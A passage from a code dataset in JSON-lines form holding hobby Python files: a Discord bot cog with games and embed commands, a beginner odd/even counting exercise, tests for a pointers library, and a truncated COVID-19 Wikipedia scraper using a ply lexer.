{everything[i]}\")\n","repo_name":"jorgefigveroa/2019-2020-PNE-Practices","sub_path":"P2/Ex7.py","file_name":"Ex7.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14522366975","text":"#---------------------------------------------------------------------#\n#IMPORTING THE MODULES\n#---------------------------------------------------------------------#\n\nfrom math import e\nfrom re import L\nfrom sys import platform\nimport discord\nimport sys\nimport enchant\nimport random\nimport string\nimport asyncio\nfrom discord import colour\nfrom discord import embeds\nfrom discord import widget\nfrom discord.embeds import Embed, EmptyEmbed\nfrom discord.ext import tasks, commands\nimport aiohttp\nimport datetime, time\nfrom discord.ext.commands import Bot, Cog, has_permissions, GameConverter, Converter\n#from discord.ext.commands.core import has_permissions\nfrom discord_components import DiscordComponents, Button, ButtonStyle, component\n#from discord.ext.commands.converter import GameConverter\nfrom PIL import Image, ImageFont, ImageDraw\nfrom io import BytesIO\n\nimport giphy_client\nfrom giphy_client.rest import ApiException\n\nfrom math import sqrt, pi\n\n#---------------------------------------------------------------------#\n#SETTING THE COG\n#---------------------------------------------------------------------#\n\nclass 
test_alox(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n#---------------------------------------------------------------------#\n#TEST COMMAND\n#---------------------------------------------------------------------#\n\n @commands.has_permissions(manage_messages=True)\n @commands.command()\n async def embed(self, ctx, *args):\n args = \" \".join(args[:])\n args = args.split(',')\n color = args[1]\n embedEmbed = discord.Embed(title = args[0], color = discord.Color.blue())\n print(args)\n length_args = (len(args)-2)//2\n for counter in range(0, length_args):\n embedEmbed.add_field(name = args[counter+2], value=args[counter+3])\n await ctx.send(embed=embedEmbed)\n\n\n\n#---------------------------------------------------------------------#\n#BOOP TEST COMMAND\n#---------------------------------------------------------------------#\n \n @commands.command()\n async def boop_test(self, ctx, user: discord.Member):\n search = \"boop\"\n api_key = self.client.GiphyKey\n api_instance = giphy_client.DefaultApi()\n\n try:\n\n api_response = api_instance.gifs_random_get(api_key, tag=search, rating=\"g\", fmt='json')\n gif = api_response.data.image_original_url\n\n embedBoop = discord.Embed(title=f'{ctx.author.name} boops {user.name}', color = 3447003)\n embedBoop.set_image(url=gif)\n embedBoop.set_footer(icon_url=ctx.author.avatar_url, text = f\"Requested by {ctx.author }\")\n\n await ctx.channel.send(embed=embedBoop)\n \n except ApiException as e:\n print(\"Exception when calling API for Giphy\")\n\n#---------------------------------------------------------------------#\n#TEST 2 COMMAND\n#---------------------------------------------------------------------#\n\n @commands.command()\n async def wordgame(self, ctx):\n random_container = ''\n channel = ctx.message.channel\n vowels = ['A', 'E', 'I', 'O', 'U']\n d = enchant.Dict(\"en_US\")\n \n for counter in range(3):\n random_container += random.choice(vowels)\n await ctx.send(f'Send a random word containing **{random_container}**')\n \n '''\n if check_word == True:\n else:\n '''\n def check(m): \n if m != None:\n check_word = d.check(m.content.lower())\n if random_container.lower() in m.content.lower() and check_word == True and m.author == ctx.author:\n return True\n else:\n return False\n else:\n ctx.channel.send('You didnt send anything!')\n try:\n msg = await self.client.wait_for('message', check=check, timeout=10)\n await channel.send(f'Correct {msg.content}!')\n except asyncio.TimeoutError:\n await ctx.send('You didnt respond in time!')\n except:\n print('You didnt do anything')\n\n#---------------------------------------------------------------------#\n#ADDING THE COG\n#---------------------------------------------------------------------#\n#hug, roast \n\n @commands.command()\n async def test(self, ctx, num : int):\n bar_start = \"<:barstart:870650383830229022>\"\n bar_middle = \"<:barmiddle:870650383293382707>\"\n bar_half = \"<:barhalf:870650383670837348>\"\n bar_mid = \"<:barmid:870690900685226046>\"\n bar_end = \"<:barend:870651709775560724>\"\n bar100end = \"<:bar100end:870693168650264586>\"\n num = 5 * round(num/5)\n main_num = num\n num = [int(a) for a in str(num)]\n if main_num == 95: \n await ctx.send(f\"{bar_start}{(bar_middle * 8)}{bar_half}\")\n elif str(num[1]) == str(5):\n remainder = (100 - main_num)-5 \n remainder = [int(a) for a in str(remainder)]\n #10, 40, 5, 5r, 40p\n await ctx.send(f\"{bar_start}{(bar_middle * (num[0]-1))}{bar_half}{(bar_mid * ((remainder[0])-1))}{bar_end}\")\n elif main_num == 100:\n 
await ctx.send(f\"{bar_start}{(bar_middle * 8)}{bar100end}\")\n else: \n remainder=(100 - main_num)\n remainder = [int(a) for a in str(remainder)]\n await ctx.send(f\"{bar_start}{(bar_middle * (num[0]-1))}{(bar_mid * ((remainder[0])-1))}{bar_end}\")\n\n @commands.command()\n async def test_cog(self, ctx):\n \n await ctx.send(list)\n\n#TEST COMMANDS\n\n @commands.command()\n async def test_rps(self, ctx, user : discord.Member):\n\n embedRPC = discord.Embed(title=\"Rock, Paper or Scissors\", description=\"Choose either one from the button shown below!\", color = 3447003)\n embedRPC.set_thumbnail(url=\"https://www.esquireme.com/public/styles/full_img/public/images/2017/05/29/rock_paper_scissors__2x.png?itok=7H3NxSxN\")\n\n embedNotHere = discord.Embed(title=f\"Rock, Paper or Scissors\", color = 3447003)\n embedNotHere.add_field(name=f\"{ctx.author.name}!\", value = f'```{ctx.author.name} did not react, or has exited!```', inline=False)\n embedNotHere.set_footer(icon_url=ctx.author.avatar_url, text=f\"Requested by {ctx.author}\")\n\n buttons = [\n Button(style = ButtonStyle.grey, label = \"Rock 🤘\", id = \"_rock\"),\n Button(style = ButtonStyle.red, label = \"Paper 📃\", id = \"_paper\"),\n Button(style = ButtonStyle.green, label = \"Scissors ✂\", id = \"_scissors\"),\n Button(style = ButtonStyle.red, label = \"Exit 🚪\", id = \"_exit\"),\n ]\n def disable_buttons():\n for t in buttons:\n t.style = ButtonStyle.grey\n t.disabled = True\n\n button_ids = [\"_rock\", \"_paper\", \"_scissors\", \"_exit\"]\n\n msg = await ctx.send(embed=embedRPC, components = [buttons])\n while True:\n try:\n global i\n res = await self.client.wait_for(\"button_click\", check=lambda i: i.component.id in button_ids and i.author.id == ctx.author.id or i.author.id == user.id and i.message.id == msg.id, timeout=10)\n global user_action\n\n if res.component.id == '_rock' == ctx.author.id:\n user_action = \"rock\"\n break\n\n elif res.component.id == '_paper':\n user_action = \"paper\"\n break\n\n elif res.component.id == '_scissors':\n user_action = \"scissors\"\n break\n\n elif res.component.id == '_exit':\n disable_buttons()\n await res.respond(embed=embedNotHere, components = [buttons], type = 7)\n user_action = None\n break\n\n except asyncio.TimeoutError:\n disable_buttons()\n #await res.respond(embed=embedNotHere, components = [buttons], type = 7)\n await msg.edit(embed=embedNotHere, components = [buttons])\n user_action = None\n break\n \n async def embedRPCWin(end):\n embedRPCWin = discord.Embed(title=\"Rock, Paper or Scissors\", description=f\"\"\"\n **CPU** vs **{ctx.author.name}**!\n \\n**CPU:** {computer_action.title()}\n **USER:** {user_action.title()}\n \"\"\", color = 3447003)\n embedRPCWin.add_field(name=f\"--------------------------------------------\", value = f'{end}' , inline=False)\n embedRPCWin.set_thumbnail(url=\"https://www.esquireme.com/public/styles/full_img/public/images/2017/05/29/rock_paper_scissors__2x.png?itok=7H3NxSxN\")\n disable_buttons()\n await res.respond(embed=embedRPCWin, components = [buttons], type=7)\n\n possible_actions = [\"rock\", \"paper\", \"scissors\"]\n computer_action = random.choice(possible_actions)\n global end\n if user_action == computer_action:\n end = (f\"```Both players selected {user_action}. It's a tie!```\")\n await embedRPCWin(end)\n elif user_action == \"rock\":\n if computer_action == \"scissors\":\n end = (\"```Rock smashes scissors! You win!```\")\n await embedRPCWin(end)\n else:\n end = (\"```Paper covers rock! 
You lose.```\")\n await embedRPCWin(end)\n elif user_action == \"paper\":\n if computer_action == \"rock\":\n end = (\"```Paper covers rock! You win!```\")\n await embedRPCWin(end)\n else:\n end = (\"```Scissors cuts paper! You lose.```\")\n await embedRPCWin(end)\n elif user_action == \"scissors\":\n if computer_action == \"paper\":\n end = (\"```Scissors cuts paper! You win!```\")\n await embedRPCWin(end)\n else:\n end = (\"```Rock smashes scissors! You lose.```\")\n await embedRPCWin(end)\n else:\n end = None\n pass\n\n @commands.command()\n async def test_embed(self, ctx):\n embedTest = discord.Embed(title=\"Test embed\", description=\"This is a test embed\", color = 0x2F3136 )\n await ctx.send(embed=embedTest)\n \ndef setup(client):\n client.add_cog(test_alox(client))","repo_name":"NPX2218/alox-bot","sub_path":"cogs/test_alox.py","file_name":"test_alox.py","file_ext":"py","file_size_in_byte":10417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42602071854","text":"#Faça um programa que peça 10 números inteiros, calcule e mostre a quantidade de números impares e de numeros pares\r\n\r\npar = impar = 0\r\n\r\nfor i in range (10):\r\n numero = int(input('Digite um número inteiro: '))\r\n if (numero % 2 == 0):\r\n par += 1\r\n else:\r\n impar += 1\r\nprint(f'Você digitou {par} números pares e {impar} números ímpares.')\r\n","repo_name":"zehzo/python-exercices","sub_path":"faculdade/monitoria - ex03.py","file_name":"monitoria - ex03.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44210689166","text":"from pointers import (\r\n to_c_ptr,\r\n TypedCPointer,\r\n StructPointer,\r\n localeconv,\r\n frexp,\r\n div,\r\n)\r\nfrom pointers._cstd import DivT\r\n\r\n\r\ndef test_to_c_ptr():\r\n ptr = to_c_ptr(5)\r\n assert type(ptr) is TypedCPointer\r\n # assert ~ptr == 5\r\n # ptr <<= 10\r\n # assert ~ptr == 10\r\n # for whatever reason, this only fails when testing. 
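The rock-paper-scissors branch chain above enumerates every pairing by hand; the same decision can be table-driven, which keeps the win/lose logic in one place. A plain-Python sketch (no discord objects, so it is illustrative rather than a drop-in for the cog):

import random

BEATS = {"rock": "scissors", "paper": "rock", "scissors": "paper"}  # key beats value

def rps_outcome(user, cpu):
    if user == cpu:
        return f"Both players selected {user}. It's a tie!"
    return "You win!" if BEATS[user] == cpu else "You lose."

assert rps_outcome("rock", "scissors") == "You win!"
assert rps_outcome("paper", "scissors") == "You lose."
random.seed(0)
print(rps_outcome("rock", random.choice(list(BEATS))))  # CPU picks a random move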
it works fine normally\r\n\r\n\r\ndef test_bindings():\r\n assert type(localeconv()) is StructPointer\r\n assert frexp(8.0, to_c_ptr(10)) == 0.5\r\n div_t = div(10, 1)\r\n assert type(div_t) is DivT\r\n assert div_t.quot is 10\r\n","repo_name":"simrit1/pointers.py","sub_path":"tests/test_binding.py","file_name":"test_binding.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"13144543590","text":"from os import PRIO_PGRP\nimport requests\nimport re\nimport ply.lex as lex\nimport ply.yacc as yacc\nfrom wordcloud import WordCloud, STOPWORDS\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom datetime import datetime\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nprint(\"\\n\\nImporting World Response from january 2020 onwards\\n\")\nprint(\"This will take about 30 seconds\\n\\n\")\ndd = []\nmm = []\nyyyy = []\nNEWS = []\nall_dates = []\nall_news = []\n\nDD_final = []\nMM_final = []\nYYYY_final = []\nNEWS_final = []\nall_dates_final = []\nall_news_final = []\n\ndef sort():\n total_dates = len(dd)\n\n # on years \n # for i in range(total_dates-1):\n # for j in range(i+1, total_dates-1):\n # if int(mm[j]) < int(mm[i]) :\n\n # yyyy[j], yyyy[i] = yyyy[i], yyyy[j]\n # mm[j], mm[i] = mm[i], mm[j]\n # dd[j], dd[i] = dd[i], dd[j]\n # all_news[j], all_news[i] = all_news[i], all_news[j]\n # all_dates[j], all_dates[i] = all_dates[i], all_dates[j]\n\n # on years \n # for i in range(total_dates-1):\n # for j in range(0, total_dates-i-1):\n # if int(YYYY[j]) > int(YYYY[j + 1]) :\n\n # YYYY[j], YYYY[j + 1] = YYYY[j + 1], YYYY[j]\n # MM[j], MM[j + 1] = MM[j + 1], MM[j]\n # DD[j], DD[j + 1] = DD[j + 1], DD[j]\n # all_news[j], all_news[j + 1] = all_news[j + 1], all_news[j]\n # all_dates[j], all_dates[j + 1] = all_dates[j + 1], all_dates[j]\n\n \n # # on months\n # for i in range(total_dates-1):\n # for j in range(0, total_dates-i-1):\n # if int(MM[j]) > int(MM[j + 1]) :\n\n # YYYY[j], YYYY[j + 1] = YYYY[j + 1], YYYY[j]\n # MM[j], MM[j + 1] = MM[j + 1], MM[j]\n # DD[j], DD[j + 1] = DD[j + 1], DD[j]\n # all_news[j], all_news[j + 1] = all_news[j + 1], all_news[j]\n # all_dates[j], all_dates[j + 1] = all_dates[j + 1], all_dates[j]\n\n # on date\n for i in range(total_dates-1):\n for j in range(0, total_dates-i-1):\n if int(dd[j]) > int(dd[j + 1]) :\n\n yyyy[j], yyyy[j + 1] = yyyy[j + 1], yyyy[j]\n mm[j], mm[j + 1] = mm[j + 1], mm[j]\n dd[j], dd[j + 1] = dd[j + 1], dd[j]\n all_news[j], all_news[j + 1] = all_news[j + 1], all_news[j]\n all_dates[j], all_dates[j + 1] = all_dates[j + 1], all_dates[j]\n\ndef month_formate(month_str):\n\n if month_str == 'January':\n return '01'\n\n if month_str == 'February':\n return '02'\n\n if month_str == 'March':\n return '03'\n\n if month_str == 'April':\n return '04'\n\n if month_str == 'May':\n return '05'\n\n if month_str == 'June':\n return '06'\n\n if month_str == 'July':\n return '07'\n\n if month_str == 'August':\n return '08'\n\n if month_str == 'September':\n return '09'\n\n if month_str == 'October':\n return '10'\n\n if month_str == 'November':\n return '11'\n\n if month_str == 'December':\n return '12'\n\ndef chnage_month(month):\n\n if month == '01':\n return'January'\n\n if month == '02':\n return'February'\n\n if month == '03':\n return'March'\n\n if month == \"04\":\n return 'April'\n\n if month == '05':\n return'May'\n\n if month == '06':\n return 'June'\n\n if 
month == '07':\n return 'July'\n\n if month == '08':\n return 'August'\n\n if month == '09':\n return 'September'\n\n if month == '10':\n return 'October'\n\n if month == '11':\n return'November'\n\n if month == '12':\n return 'December'\n\n\n\nmain_url='https://en.wikipedia.org/wiki/Responses_to_the_COVID-19_pandemic_in_'\n\nmonths = ['January_2020', 'February_2020', 'March_2020', 'April_2020',\n 'May_2020', 'June_2020', 'July_2020', 'August_2020', 'September_2020',\n 'October_2020', 'November_2020', 'December_2020', 'January_2021', 'February_2021',\n 'March_2021', 'April_2021', 'May_2021', 'June_2021', 'July_2021',\n 'August_2021', 'September_2021', 'October_2021', 'November_2021', 'December_2021',\n 'January_2022', 'February_2022','March_2022']\n\n# months = ['January_2020', 'February_2020']\n\ntotal_months = len(months)\n\ntokens = ['DATE_ANCHOR', 'DATE', 'NEWS_LIST','STOP_POINT']\n\ndef t_STOP_POINT(t):\n r'

'\n    return t\n\ndef t_DATE_ANCHOR(t):\n    r'\d{1,2}\s\w{3,9}<'\n    return t\n\ndef t_NEWS_LIST(t):\n    r'((  • .+  • \s*)+|(  .+\s  \n
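The scraper record above tokenizes the fetched page text with ply, where each t_NAME function's raw-string docstring is its token regex; the NEWS_LIST pattern is cut off mid-definition here. For reference, a minimal self-contained ply lexer using the same convention (the DATE pattern below is an assumption for illustration, not the garbled original):

import ply.lex as lex

tokens = ["DATE", "WORD"]

def t_DATE(t):
    r"\d{1,2}\s[A-Z][a-z]{2,8}"   # e.g. "14 February"
    return t

def t_WORD(t):
    r"[A-Za-z]+"
    return t

t_ignore = " \t\n"                 # skip plain whitespace between tokens

def t_error(t):
    t.lexer.skip(1)                # drop any character no rule matches

lexer = lex.lex()
lexer.input("On 14 February lockdowns began")
print([(tok.type, tok.value) for tok in lexer])
# [('WORD', 'On'), ('DATE', '14 February'), ('WORD', 'lockdowns'), ('WORD', 'began')]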